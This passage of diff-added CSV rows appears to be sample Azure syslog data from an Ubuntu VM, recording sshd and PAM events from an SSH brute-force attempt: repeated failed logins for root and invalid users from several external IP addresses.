+15109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:51,UbuntuDevEnv,2019-06-26 05:16:51,auth,UbuntuDevEnv,info,Invalid user sg from 140.143.223.242 port 55358,7958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sg,140.143.223.2,55358,,
+15110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:51,UbuntuDevEnv,2019-06-26 05:16:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,7958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:51,UbuntuDevEnv,2019-06-26 05:16:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:53,UbuntuDevEnv,2019-06-26 05:16:53,auth,UbuntuDevEnv,info,Failed password for invalid user sg from 140.143.223.242 port 55358 ssh2,7958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sg,140.143.223.2,55358,,
+15113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:54,UbuntuDevEnv,2019-06-26 05:16:53,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 55358:11: Bye Bye [preauth],7958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,55358,,
+15114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:16:54,UbuntuDevEnv,2019-06-26 05:16:53,auth,UbuntuDevEnv,info,Disconnected from invalid user sg 140.143.223.242 port 55358 [preauth],7958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sg,140.143.223.2,55358,,
+15115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:01,UbuntuDevEnv,2019-06-26 05:17:00,auth,UbuntuDevEnv,info,Connection closed by 58.242.82.13 port 6902 [preauth],7961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.242.82.1,6902,,
+15116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:06,UbuntuDevEnv,2019-06-26 05:17:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:07,UbuntuDevEnv,2019-06-26 05:17:06,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 13543 ssh2,8013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,13543,,
+15118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:10,UbuntuDevEnv,2019-06-26 05:17:09,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 13543 ssh2,8013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,13543,,
+15119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:10,UbuntuDevEnv,2019-06-26 05:17:09,auth,UbuntuDevEnv,info,Invalid user fepbytr from 196.41.208.238 port 23772,8037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fepbytr,196.41.208.2,23772,,
+15120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:10,UbuntuDevEnv,2019-06-26 05:17:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,8037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+15121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:10,UbuntuDevEnv,2019-06-26 05:17:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:11,UbuntuDevEnv,2019-06-26 05:17:11,auth,UbuntuDevEnv,info,Failed password for invalid user fepbytr from 196.41.208.238 port 23772 ssh2,8037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fepbytr,196.41.208.2,23772,,
+15123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:12,UbuntuDevEnv,2019-06-26 05:17:11,auth,UbuntuDevEnv,info,Disconnected from invalid user fepbytr 196.41.208.238 port 23772 [preauth],8037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fepbytr,196.41.208.2,23772,,
+15124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:12,UbuntuDevEnv,2019-06-26 05:17:11,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 23772:11: Bye Bye [preauth],8037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,23772,,
+15125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:12,UbuntuDevEnv,2019-06-26 05:17:12,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 13543 ssh2,8013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,13543,,
+15126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:21,UbuntuDevEnv,2019-06-26 05:17:20,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 13543 ssh2],8013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,13543,,
+15127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:21,UbuntuDevEnv,2019-06-26 05:17:20,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,8013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:21,UbuntuDevEnv,2019-06-26 05:17:20,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:21,UbuntuDevEnv,2019-06-26 05:17:20,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 13543: Too many authentication failures [preauth],8013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,13543,,
+15130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:21,UbuntuDevEnv,2019-06-26 05:17:20,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 13543 ssh2 [preauth],8013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,13543,,
+15131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:24,UbuntuDevEnv,2019-06-26 05:17:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:25,UbuntuDevEnv,2019-06-26 05:17:25,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 22017 ssh2,8083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,22017,,
+15133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:36,UbuntuDevEnv,2019-06-26 05:17:35,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 22017 ssh2],8083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,22017,,
+15134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:36,UbuntuDevEnv,2019-06-26 05:17:36,auth,UbuntuDevEnv,info,Invalid user travis from 200.6.188.38 port 55680,8131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,travis,200.6.188.3,55680,,
+15135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:36,UbuntuDevEnv,2019-06-26 05:17:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:36,UbuntuDevEnv,2019-06-26 05:17:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,8131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+15137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:38,UbuntuDevEnv,2019-06-26 05:17:37,auth,UbuntuDevEnv,info,Failed password for invalid user travis from 200.6.188.38 port 55680 ssh2,8131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,travis,200.6.188.3,55680,,
+15138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:38,UbuntuDevEnv,2019-06-26 05:17:37,auth,UbuntuDevEnv,info,Disconnected from invalid user travis 200.6.188.38 port 55680 [preauth],8131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,travis,200.6.188.3,55680,,
+15139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:38,UbuntuDevEnv,2019-06-26 05:17:37,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 55680:11: Bye Bye [preauth],8131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,55680,,
+15140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:38,UbuntuDevEnv,2019-06-26 05:17:37,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 22017 ssh2,8083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,22017,,
+15141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:38,UbuntuDevEnv,2019-06-26 05:17:38,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 22017: Too many authentication failures [preauth],8083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,22017,,
+15142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:38,UbuntuDevEnv,2019-06-26 05:17:38,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:38,UbuntuDevEnv,2019-06-26 05:17:38,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,8083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:38,UbuntuDevEnv,2019-06-26 05:17:38,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 22017 ssh2 [preauth],8083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,22017,,
+15145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:41,UbuntuDevEnv,2019-06-26 05:17:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:43,UbuntuDevEnv,2019-06-26 05:17:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29377 ssh2,8150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29377,,
+15147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:47,UbuntuDevEnv,2019-06-26 05:17:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29377 ssh2,8150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29377,,
+15148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:49,UbuntuDevEnv,2019-06-26 05:17:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29377 ssh2,8150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29377,,
+15149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:57,UbuntuDevEnv,2019-06-26 05:17:56,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 29377 ssh2],8150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29377,,
+15150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:57,UbuntuDevEnv,2019-06-26 05:17:56,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 29377 ssh2 [preauth],8150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29377,,
+15151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:57,UbuntuDevEnv,2019-06-26 05:17:56,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:57,UbuntuDevEnv,2019-06-26 05:17:56,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 29377: Too many authentication failures [preauth],8150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,29377,,
+15153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:17:57,UbuntuDevEnv,2019-06-26 05:17:56,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,8150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:02,UbuntuDevEnv,2019-06-26 05:18:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:04,UbuntuDevEnv,2019-06-26 05:18:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37035 ssh2,8218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37035,,
+15156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:16,UbuntuDevEnv,2019-06-26 05:18:14,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 37035 ssh2],8218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37035,,
+15157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:17,UbuntuDevEnv,2019-06-26 05:18:17,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37035 ssh2,8218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37035,,
+15158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:17,UbuntuDevEnv,2019-06-26 05:18:17,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 37035 ssh2 [preauth],8218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37035,,
+15159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:17,UbuntuDevEnv,2019-06-26 05:18:17,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:17,UbuntuDevEnv,2019-06-26 05:18:17,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 37035: Too many authentication failures [preauth],8218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,37035,,
+15161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:17,UbuntuDevEnv,2019-06-26 05:18:17,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,8218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:22,UbuntuDevEnv,2019-06-26 05:18:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:24,UbuntuDevEnv,2019-06-26 05:18:24,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 45397 ssh2,8579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,45397,,
+15164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:27,UbuntuDevEnv,2019-06-26 05:18:26,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 45397 ssh2,8579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,45397,,
+15165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:37,UbuntuDevEnv,2019-06-26 05:18:37,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 45397: Too many authentication failures [preauth],8579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,45397,,
+15166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:37,UbuntuDevEnv,2019-06-26 05:18:37,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 45397 ssh2 [preauth],8579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,45397,,
+15167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:37,UbuntuDevEnv,2019-06-26 05:18:37,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 45397 ssh2],8579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,45397,,
